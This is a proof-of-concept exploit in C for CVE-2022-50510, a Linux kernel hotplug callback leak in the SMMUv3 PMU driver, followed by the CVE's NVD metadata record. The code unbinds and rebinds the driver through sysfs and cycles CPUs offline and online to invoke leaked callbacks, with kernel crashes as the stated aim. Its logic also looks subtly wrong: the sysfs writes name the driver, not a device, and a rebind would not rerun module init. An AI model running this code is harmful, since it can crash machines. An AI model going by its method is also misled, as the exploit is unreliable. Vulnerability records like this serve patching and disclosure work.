CVE-2022-50510

/* CVE-2022-50510 PoC - Trigger hotplug callback leak * * This PoC demonstrates the vulnerability by attempting to force * arm_smmu_pmu_init() to fail at platform_driver_register() stage, * leaving the cpuhp callback registered. * * Note: Requires SMMUv3 PMU hardware or a compatible test environment. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #include <errno.h> #define SYSFS_CPU_PATH "/sys/devices/system/cpu" #define SMMUV3_PMU_DEV "/sys/bus/platform/drivers/arm-smmu-pmu" /* Attempt to trigger arm_smmu_pmu reinitialization */ static int trigger_smmuv3_pmu_reinit(void) { int ret; /* Try to unbind and rebind the driver to trigger init path */ /* This may cause platform_driver_register to fail under certain conditions */ ret = system("echo arm-smmu-pmu > /sys/bus/platform/drivers/arm-smmu-pmu/unbind 2>/dev/null"); if (ret != 0) { fprintf(stderr, "Failed to unbind driver: %d\n", ret); return -1; } /* Small delay */ usleep(100000); /* Rebind - if conditions are right, this triggers the leak */ ret = system("echo arm-smmu-pmu > /sys/bus/platform/drivers/arm-smmu-pmu/bind 2>/dev/null"); return ret; } /* Force CPU hotplug events to trigger leaked callbacks */ static int force_cpu_hotplug(int cpu) { char path[256]; char buf[16]; int fd; snprintf(path, sizeof(path), "%s/cpu%d/online", SYSFS_CPU_PATH, cpu); /* Offline the CPU */ fd = open(path, O_WRONLY); if (fd < 0) { perror("open online"); return -1; } write(fd, "0", 1); close(fd); usleep(500000); /* Online the CPU - triggers hotplug callback */ fd = open(path, O_WRONLY); if (fd < 0) { perror("open online"); return -1; } write(fd, "1", 1); close(fd); return 0; } int main(int argc, char *argv[]) { int i, num_cpus; printf("CVE-2022-50510 PoC - SMMUv3 PMU hotplug callback leak\n"); /* Detect number of CPUs */ num_cpus = sysconf(_SC_NPROCESSORS_ONLN); printf("Detected %d CPUs\n", num_cpus); /* Step 1: Trigger the leak by forcing reinit failure */ printf("[*] Triggering arm_smmu_pmu_init() failure path...\n"); for (i = 0; i < 10; i++) { if (trigger_smmuv3_pmu_reinit() != 0) { printf("[+] Potential leak triggered on iteration %d\n", i); break; } } /* Step 2: Force CPU hotplug to invoke leaked callbacks */ printf("[*] Forcing CPU hotplug events...\n"); for (i = 1; i < num_cpus && i < 4; i++) { printf("[*] Cycling CPU %d\n", i); if (force_cpu_hotplug(i) != 0) { printf("[-] Failed to cycle CPU %d (may need root)\n", i); } } printf("[*] Done. Check dmesg for kernel warnings or crashes.\n"); return 0; }

{"cve": {"id": "CVE-2022-50510", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:34.210", "lastModified": "2026-03-17T14:06:57.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/smmuv3: Fix hotplug callback leak in arm_smmu_pmu_init()\n\narm_smmu_pmu_init() won't remove the callback added by\ncpuhp_setup_state_multi() when platform_driver_register() failed. Remove\nthe callback by cpuhp_remove_multi_state() in fail path.\n\nSimilar to the handling of arm_ccn_init() in commit 26242b330093 (\"bus:\narm-ccn: Prevent hotplug callback leak\")"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2", "versionEndExcluding": "5.4.229", "matchCriteriaId": "8375B740-EBAC-44B1-B9EC-B3FB6D080386"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/359286f886feef38536eaa7e673dc3440f03b0a1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/582babe17ea878ec1d76f30e03f3a6ce6e30eb91", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6f2d566b46436a50a80d6445e82879686b89588c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b131304fe722853cf26e55c4fa21fc58a36e7f21", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d69bdb61d577297d3851fc9f6403574bf73ef41f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f245ca9a0fe7f794a8187ad803d5e2ced5a11cb2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}